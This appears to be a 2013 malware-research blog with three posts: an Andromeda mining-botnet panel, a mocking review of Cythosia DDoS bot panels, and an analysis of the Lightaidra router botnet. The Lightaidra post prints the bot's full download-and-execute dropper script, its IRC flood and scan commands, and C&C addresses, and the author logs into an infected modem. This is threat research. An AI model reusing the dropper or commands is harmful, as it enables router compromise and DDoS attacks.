Tuesday, August 27, 2013

Bitcoin Mining Adromeda Botnet

Admin Panel:
hxxp://skyline2050.net/761994/adm.php
skyline2050.net. 774 IN A 193.107.16.139

Bins hosted on:
zalil.ru. 830 IN A 194.63.142.66

Domain Name: SKYLINE2050.NET
Registrar: CENTER OF UKRAINIAN INTERNET NAMES
Whois Server: whois.ukrnames.com
Referral URL: http://www.ukrnames.com

Registrant:
Staiger Markus bitcoinlab@safe-mail.net
Kola,  90,
Kiew, 04060
UKRAINE
+380.671234567


Stats:


Bots


Blacklist



 Tasks



Settings
Pssst, your RC4 key is showing. 


What was that task?


Wednesday, August 21, 2013

Cythosia DDoS Botnet

Cythosia is a typical shit DDoS bot.

As advertised:
http://www.hackforums.net/showthread.php?tid=1415489
Controlled via: Webpanel
Found at: Opensc.ws
Language: C# (2.0)
Developed by: Post.Mort3m
Current Version: 1.0.8
# Runs on Win2k - Win7 / x86 and x64
~ Limited/Guest/Administrator Acconts
# Various Autostart Names and Entries
Main Functions:
+ Download & Execute
+ Update
Distributed Denial of Service Functions (DDoS)
+ Syn
~ 20 Bots can kill little Sites
~ Customizeable Port & Strength(Http, Sql, Gameserver)
+ UDP
~ Perform attacks on homeconnections
~ Highly customizeable
+ HTTP
~ Multithreaded GET Requests - Generates Traffic as hell
~ Keeps GET Requests open
Socks5 Proxy
+ Opens Port with UPnP if router supports it
+ Redirects all TCP requests multithreaded -> very good speed
+ Configureable Username and Password
Control Panel
+ Nice looking Ajax Panel
+ Hardcoded Password -> secure
+ Taskmanagement System
+ Export Online SOCKS5 LIST

@Blixx on HF - nice TUT - http://www.hackforums.net/showthread.php?tid=1418263

But I'm confused. Why do the H4X0r$ on HF not know how to setup a simple shitty bot panel?
Oh.. right.. LMAO

I downloaded the archive and inside is a .NET obfuscator. Why? Was this bot was written in C# or not?? (See above in advert, Language: C# )

Was bored so I kept looking... the source of index.php:

<?php
session_start();
$crypt_pw = md5("admin");
if(isset($_POST['submit']))
{
if(isset($_POST['pw']) && md5($_POST['pw']) == $crypt_pw)
{
$_SESSION['hydra_loggedin'] = 1;
header("Location: admin/index.php");
}
else
{
header("Location: index.php");
}
}
?>

Hahaha!
Is this a joke?
Either way, I'm laughing


15 Cythosia DDoS Botnet Panels 

I decided to gather all the panels I could find and have a look inside.

hxxp://fixed-ao.com.ar/Webpanel/admin/index.php
hxxp://myfiles.besaba.com/admin/index.php
hxxp://www.kazekiki.com.nu/Webpanel/admin/index.php
hxxp://zjomzjom.freehost.pl/admin/index.php
hxxp://mucomucox4.bedavahost.biz/Botnet/admin/index.php
hxxp://testingsecuritybyv0id.com/91287521985/admin/index.php
hxxp://boucraa.no-ip.org/bot/admin/index.php
hxxp://monit-css.vv.si/admin/index.php
hxxp://tigerromnci.eb2a.com/Webpanel/admin/index.php
hxxp://bouxss.juplo.com/1/admin/index.php
hxxp://evcorp.xtreemhost.com/Webpanel/admin/index.php
hxxp://www.l2eyes.com/Webpanel/admin/index.php
hxxp://xxxpass.netsons.org/Webpanel/admin/index.php
hxxp://www.micr0soft.tk/
hxxp://www.eocgroupz.com/aldi/Webpanel/admin/index.php


Ok, I have a TUT for all the Ubers at HF.

Step 1. Use shared free hosting for your bot panels, that's a really good idea. I like having adverts on my C&C panels.

Good grief...


Step 2. Another great thing about free hosting is they rate limit or simply cut off your MySQL usage. Thankfully the panel has a hard coded PW so I can see a panel of error messages. Yay.


Lol 


Lol again...


and again.


hmmm...not working?

Step 3. Be sure to use the included Eazfuscator.NET .NET Obfuscator and Optimizer - That shiz will FUD you up..












Step 4. Profit.


Summary

15 panels on different domains, using different bot builds.

0 bots online.

30 mins. of my time wasted.

At least I had a good laugh.


Monday, August 19, 2013

Lightaidra - Embedded Linux Device Botnet

I was checking some logs and found an IP attempting to connect to telnet (port 23) on one of my servers. Usually when you see this kind of stuff in the logs it is just a scanner or someone running nmap to look around. This time I find an active bot scanning and building a botnet.

The Lightaidra DDoS malware was developed in 2012 but appears to be still doing quite well in the wild. Mainly because this bot relies on the fact that many consumer network devices that this bot targets use the default username and password, something like admin/admin or root/admin. There are other resources and blogs that give more details about this particular strain. I have included some links at the bottom.

Lightaidra - is an open source embedded linux device bot and is described by its creator, Federico Fazzi, as an "IRC-based mass router scanner/exploiter". What this means is that instead of it infecting PCs, this bot runs on devices like cable and DSL modems.

The operation of this bot is straightforward and requires two servers to manage the entire botnet. One server that will host the various binaries used for infection and an IRC server to control the botnet actions.

The first thing the bot does when it connects to a new modem is run "getbinaries.sh" - Note that Lightaidra requires linux to be running on the device.
#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.
# YOUR HTTPD SERVER:
REFERENCE_HTTP="http://127.0.0.1"
# NAME OF BINARIES:
REFERENCE_MIPSEL="mipsel"
REFERENCE_MIPS="mips"
REFERENCE_SUPERH="sh"
REFERENCE_ARM="arm"
REFERENCE_PPC="ppc"
rm -fr /var/run/${REFERENCE_MIPSEL} \
/var/run/${REFERENCE_MIPS} \
/var/run/${REFERENCE_SUPERH} \
/var/run/${REFERENCE_ARM} \
/var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}
sleep 3;
rm -fr /var/run/getbinaries.sh
As you can see, all this script does is download the binaries for each CPU architecture the bot supports, MIPSEL, MIPS, ARM, SuperH (it can also be compiled as 32 and 64bit linux binary).  The bot does not "check" the architecture first and download the correct binary. It just downloads and runs them all, and whichever binary executes is on the correct architecture. Thats not lazy at all.

After the binary is downloaded and executed from the http server, it connects back to the IRC command and control server and awaits further instructions.

Lightaidra's primary features are scanning for other routers/modems to infect and (DDoS) Distributed Denial of Service attacks. The bot can also execute commands on the system it is installed.



So here is how I found it. I telnet back to the IP I found in my logs..


No password for root. Face-palm. 
Looks like I was connected to a DSL modem. Most consumer modems and routers only use default credentials like "admin/admin" or "root/admin", which is why Lightaidra is able to target and exploit these devices easily.  

ps output 
This is an indicator of Lightaidra infection - the default path is /var/run
Note this is a device with ARM CPU architecture. 



Look inside the default Lightaidra directory /var/run and you will see the downloaded binaries and the logfiles .lightpid and .lightscan
the file .lightscan is a list of IP addresses that have been found and respond to telnet. 



Command & Control servers I found inside the ARM and SH binaries.
178.79.183.247
192.79.153.207


The binary reveals the C&C in plain text.




This C&C has also been spotted by other researchers at Inside Your Botnet.


* Looking up 178.79.183.247
* Connecting to 178.79.183.247 (178.79.183.247) port 11112...
* Connected. Now logging in...
* Welcome to the Internet Relay Network @localhost.it
* Your host is irc.pollo.org, running version ngircd-19.2 (x86_64/pc/linux-gnu)
* This server has been started Sun Jun 30 2013 at 16:13:07 (UTC)
* irc.pollo.org ngircd-19.2 acCiorRswx beiIklmnoOPrRstvz
* RFC2812 IRCD=ngIRCd CASEMAPPING=ascii PREFIX=(ov)@+ CHANTYPES=#&+ CHANMODES=beI,k,l,imnOPRstz CHANLIMIT=#&+:2 :are supported on this server
* CHANNELLEN=50 NICKLEN=20 TOPICLEN=490 AWAYLEN=127 KICKLEN=400 MODES=5 MAXLIST=beI:50 EXCEPTS=e INVEX=I PENALTY :are supported on this server
* There are 804 users and 0 services on 1 servers
* 1 :channels formed
* I have 804 users, 0 services and 0 servers
* 804 1014 :Current local users: 804, Max: 1014
* 804 1014 :Current global users: 804, Max: 1014
* Highest connection count: 1014 (170926 connections received)



Lightaidra Commands:
Lightaidra's primary features are scanning for other routers/modems to infect and (DDoS) Distributed Denial of Service attacks. The bot can also execute commands on the system it is installed.

PRIVMSG %s :*
PRIVMSG %s :* .login                <password>        - login to bot's party-line
PRIVMSG %s :* .logout                                 - logout from bot's party-line
PRIVMSG %s :* *** Miscs Commands
PRIVMSG %s :* .exec                 <commands>        - execute a system command
PRIVMSG %s :* .version                                - show the current version of bot
PRIVMSG %s :* .status                                 - show the status of bot
PRIVMSG %s :* .help                                   - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b>      <user> <passwd>   - scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b>                        - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive   <user> <pass>     - scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive                     - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random      <user> <pass>     - scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random                        - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b   <user> <pass>     - scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b                     - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop                                   - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof          <ip>                    - set the source address ip spoof
PRIVMSG %s :* .synflood       <host> <port> <secs>    - tcp syn flooder
PRIVMSG %s :* .ngsynflood     <host> <port> <secs>    - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood       <host> <port> <secs>    - tcp ack flooder
PRIVMSG %s :* .ngackflood     <host> <port> <secs>    - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan        <channel>               - set new master channel
PRIVMSG %s :* .join           <channel> <password>    - join bot in selected room
PRIVMSG %s :* .part           <channel>               - part bot from selected room
PRIVMSG %s :* .quit                                   - kill the current process
PRIVMSG %s :* *** EOF
 
Links about Lightaidra
http://vierko.org/tech/lightaidra-0x2012/

http://www.fitsec.com/blog/index.php/2012/02/19/new-piece-of-malicious-code-infecting-routers-and-iptvs/